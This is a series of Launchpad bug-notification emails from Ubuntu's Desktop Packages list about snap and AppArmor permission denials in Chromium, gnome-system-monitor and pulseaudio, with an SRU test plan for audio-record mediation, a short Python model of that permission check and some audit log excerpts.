** Changed in: snapd
   Importance: Undecided => Low

** Changed in: snapd
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: snapd
   Milestone: None => 2.42.3

** Changed in: snapd (Ubuntu)
   Status: In Progress => Triaged

** Changed in: snapd
   Status: New => In Progress

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title:
  [snap] Permission denied on Private encrypted folder

Status in AppArmor:
  Triaged
Status in snapd:
  In Progress
Status in chromium-browser package in Ubuntu:
  Invalid
Status in snapd package in Ubuntu:
  Triaged

Bug description:
  When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

  Package: chromium-browser
  Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
https://github.com/snapcore/snapd/pull/7779

** Also affects: snapd
   Importance: Undecided
   Status: New

** Changed in: snapd
   Status: New => In Progress

** Changed in: snapd
   Importance: Undecided => Medium

** Changed in: snapd
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: snapd (Ubuntu)
   Status: In Progress => Triaged

** Changed in: snapd (Ubuntu)
   Importance: Undecided => Medium

** Changed in: snapd (Ubuntu)
   Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: snapd
   Milestone: None => 2.42.3

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1851211

Title:
  [snap] SoloKeys not supported by u2f-devices interface

Status in snapd:
  In Progress
Status in chromium-browser package in Ubuntu:
  Confirmed
Status in snapd package in Ubuntu:
  Triaged

Bug description:
  This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 it is still open.

  No chance to use such a key in the browser.
  dmesg output is:

  My dmesg output shows a lot of DENIED:
  audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Installing 1:8.0-0ubuntu3.11 from xenial-proposed, the test plan and James' addition for mediation is preserved across snapd restart all works as expected. Marking as verification done. ** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. 
[Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes + + $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. 
x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Installing 1:11.1-1ubuntu7.5 from bionic-proposed, the test plan and James' addition for mediation is preserved across snapd restart all works as expected. Marking as verification done.

** Tags removed: verification-needed-bionic
** Tags added: verification-done-bionic

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title:
  please enable snap mediation support

Status in pulseaudio package in Ubuntu:
  Fix Released
Status in pulseaudio source package in Xenial:
  Fix Committed
Status in pulseaudio source package in Bionic:
  Fix Committed

Bug description:

[Impact]

Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

[Test Case]

IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy

For unconfined applications:
$ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
yes
$ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ paplay /tmp/out.wav && echo "yes"
yes

For confined, non-snap applications:
$ sudo apt-get install evince
$ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
$ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
yes

For classic snaps:
$ sudo snap install test-snapd-classic-confinement --classic
$ snap run --shell test-snapd-classic-confinement
$ cat /proc/self/attr/current # verify we are classic confined
snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
$ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
yes
$ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ paplay /tmp/out.wav && echo "yes"
yes
$ exit # out of snap run --shell

For strict snaps with pulseaudio:
$ sudo snap install test-snapd-pulseaudio --edge
$ snap connections test-snapd-pulseaudio
Interface   Plug                              Slot         Notes
pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
$ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
...
$ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
$ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
xcb_connection_has_error() returned true
yes

(note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)

$ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
...
^Cyes
$ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
...
yes

For strict snaps with audio-playback/audio-record:
$ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04
$ sudo snap install test-snapd-audio-record --edge
$ snap connections test-snapd-audio-record # record not connected
Interface Plug
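The record decision described in the [Impact] section, modelled in Python as an added example (it is not the pulseaudio module, which the description says talks to snapd through snapd-glib). The lookup_snap callback standing in for the snapd query, the SNAPD_STATE table and the fail-closed handling of malformed labels and unknown snaps are assumptions of this example; the labels are the ones the test case produces.

```python
# Interfaces that, per the description above, let a strict snap record.
RECORD_INTERFACES = frozenset({"pulseaudio", "audio-record"})


def snap_of_label(raw_label):
    """Split a label as read from /proc/<pid>/attr/current.

    Returns (is_snap, snap_name). snap_name is None when the label starts
    with 'snap.' but does not have the snap.<snap>.<app> shape.
    """
    label = raw_label.strip()
    if label.endswith(")") and " (" in label:
        label = label.rsplit(" (", 1)[0]      # drop "(enforce)" / "(complain)"
    if not label.startswith("snap."):
        return False, None
    parts = label.split(".")
    well_formed = len(parts) >= 3 and all(parts[1:3])
    return True, (parts[1] if well_formed else None)


def may_record(raw_label, lookup_snap):
    """Decide whether a client with this AppArmor label may record.

    lookup_snap(name) stands in for the query to snapd and returns
    {"confinement": str, "plugs": iterable of connected interface names};
    it raises LookupError for a snap it does not know.
    """
    is_snap, name = snap_of_label(raw_label)
    if not is_snap:
        return True                # unconfined or non-snap profile: not restricted here
    if name is None:
        return False               # assumption: malformed snap label fails closed
    try:
        info = lookup_snap(name)
    except LookupError:
        return False               # assumption: no answer from snapd fails closed
    if info["confinement"] == "classic":
        return True
    return bool(RECORD_INTERFACES.intersection(info["plugs"]))


# Constructed stand-in for snapd's answers, mirroring the snaps in the test case.
SNAPD_STATE = {
    "test-snapd-classic-confinement": {"confinement": "classic", "plugs": []},
    "test-snapd-pulseaudio": {"confinement": "strict", "plugs": ["pulseaudio"]},
    "test-snapd-audio-record": {"confinement": "strict", "plugs": ["audio-playback"]},
}


def lookup(name):
    return SNAPD_STATE[name]       # KeyError is a LookupError


def run_matrix():
    """Evaluate the record decision for each client type in the test case."""
    labels = [
        "unconfined",
        "/usr/bin/evince (enforce)",
        "snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)",
        "snap.test-snapd-pulseaudio.record (enforce)",
        "snap.test-snapd-audio-record.record (enforce)",
    ]
    return {label: may_record(label, lookup) for label in labels}


if __name__ == "__main__":
    for label, allowed in run_matrix().items():
        print("allow" if allowed else "deny ", label)
```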
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. 
[Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: - $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap + $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. 
x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 - $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap + $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
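Review bot: the two '+' lines that replace 'sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap' and './test-snapd-audio-record_1_amd64.snap' with '--edge' installs no longer fix which build of the test snaps the plan exercises, because whatever is published on the edge channel at the time gets installed. Consider having the plan record the revision that was verified (for example from 'snap list test-snapd-pulseaudio' and 'snap list test-snapd-audio-record') next to each install step, so a later verification run can be compared against the same snap.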
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
** Changed in: snapd (Ubuntu)
   Status: Triaged => In Progress

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1851211

Title:
  [snap] SoloKeys not supported by u2f-devices interface

Status in chromium-browser package in Ubuntu:
  Confirmed
Status in snapd package in Ubuntu:
  In Progress

Bug description:
  This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 it is still open.

  No chance to use such a key in the browser.
  dmesg output is:

  My dmesg output shows a lot of DENIED:
  audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
[Desktop-packages] [Bug 1778332] Re: Apparmor Permission Denied (apparmor="DENIED")
Clement, your issue is different than Charles'. More information is required from you to triage your issue. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1778332 Title: Apparmor Permission Denied (apparmor="DENIED") Status in gnome-system-monitor package in Ubuntu: Expired Bug description: I try to launch the system monitor but nothing show up. journalctl -f Result: Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname kernel: audit: type=1400 audit(1529751864.744:47): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: snap-update-ns failed with code 1: File exists Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000) /var/log/syslog Result: Jun 23 19:03:17 laptop-hostname kernel: [ 433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/" flags="rw, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.799121 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/snap/gnome-3-26-1604/64 /snap/gnome-system-monitor/45/gnome-platform none bind,ro 0 0): 
permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.833637 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.301209] audit: type=1400 audit(1529751797.828:43): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/local/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.835300 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.838094 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/var/cache/fontconfig /var/cache/fontconfig none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.302850] audit: type=1400 audit(1529751797.832:44): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.305652] audit: type=1400 audit(1529751797.832:45): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/var/cache/fontconfig/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.336540] audit: type=1400 audit(1529751797.864:46): apparmor="DENIED" operation="capable" 
profile="snap-update-ns.gnome-system-monitor" pid=7478 comm="3" capability=6 capname="setgid" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: snap-update-ns failed with code 1 Jun 23 19:03:18 laptop-hostname PackageKit: resolve transaction /260_bebcecdc from uid 1000 finished with success after 610ms To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1778332/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1778332] Re: Apparmor Permission Denied (apparmor="DENIED")
Nov 11 09:47:56 kernel: audit: type=1400 audit(1573487276.018:797080): apparmor="DENIED" operation="open" profile="snap.gnome-system-monitor.gnome-system-monitor" name="/run/systemd/sessions/c1" pid=8733 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 I'm able to reproduce this on 19.10 under X11 (but not Wayland) in the default install. I'll update snap for this denial. That fix should be in snapd 2.43. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1778332 Title: Apparmor Permission Denied (apparmor="DENIED") Status in gnome-system-monitor package in Ubuntu: Expired Bug description: I try to launch the system monitor but nothing show up. journalctl -f Result: Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname kernel: audit: type=1400 audit(1529751864.744:47): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: snap-update-ns failed with code 1: File exists Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000) /var/log/syslog Result: Jun 23 19:03:17 laptop-hostname kernel: [ 433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/"
flags="rw, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.799121 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/snap/gnome-3-26-1604/64 /snap/gnome-system-monitor/45/gnome-platform none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.833637 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.301209] audit: type=1400 audit(1529751797.828:43): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/local/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.835300 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.838094 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/var/cache/fontconfig /var/cache/fontconfig none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.302850] audit: type=1400 audit(1529751797.832:44): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.305652] audit: type=1400 audit(1529751797.832:45): apparmor="DENIED" 
operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/var/cache/fontconfig/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.336540] audit: type=1400 audit(1529751797.864:46): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=7478 comm="3" capability=6 capname="setgid" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: snap-update-ns failed with code 1 Jun 23 19:03:18 laptop-hostname PackageKit: resolve transaction /260_bebcecdc from uid 1000 finished with success after 610ms To manage notifications about this bug go to:
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: snapd (Ubuntu) Status: Triaged => In Progress ** Also affects: apparmor Importance: Undecided Status: New ** Changed in: apparmor Status: New => Triaged ** Changed in: apparmor Importance: Undecided => Low ** Changed in: apparmor Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Triaged Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: In Progress Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1791454] Re: system-monitor produces many apparmor permission denied warnings
Note, these accesses were added in 22d37f834b6f4605faa3887bae3cf4d0e1673278 ** Changed in: gnome-system-monitor (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1791454 Title: system-monitor produces many apparmor permission denied warnings Status in gnome-system-monitor package in Ubuntu: Fix Released Bug description: gnome-system-monitor (installed as snap, latest stable version) on Ubuntu 18.04.1 causes while running many warnings in the system log of the following type: audit[2095]: AVC apparmor="DENIED" operation="open" profile="snap.gnome-system-monitor.gnome-system-monitor" name="/proc/2932/wchan" pid=2095 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 audit[2095]: AVC apparmor="DENIED" operation="open" profile="snap.gnome-system-monitor.gnome-system-monitor" name="/proc/1/cgroup" pid=2095 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 The output of journalctl | grep "operation=\"open\" profile=\"snap.gnome-system-monitor.gnome" | wc -l amounts on my system to 4 924 215 . For comparison journalctl | wc -l amounts to 5 143 715 . Thus it is really spamming my system log. output of snap info gnome-system-monitor is attached. output of lsb_release -rd: Description:Ubuntu 18.04.1 LTS Release:18.04 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1791454/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
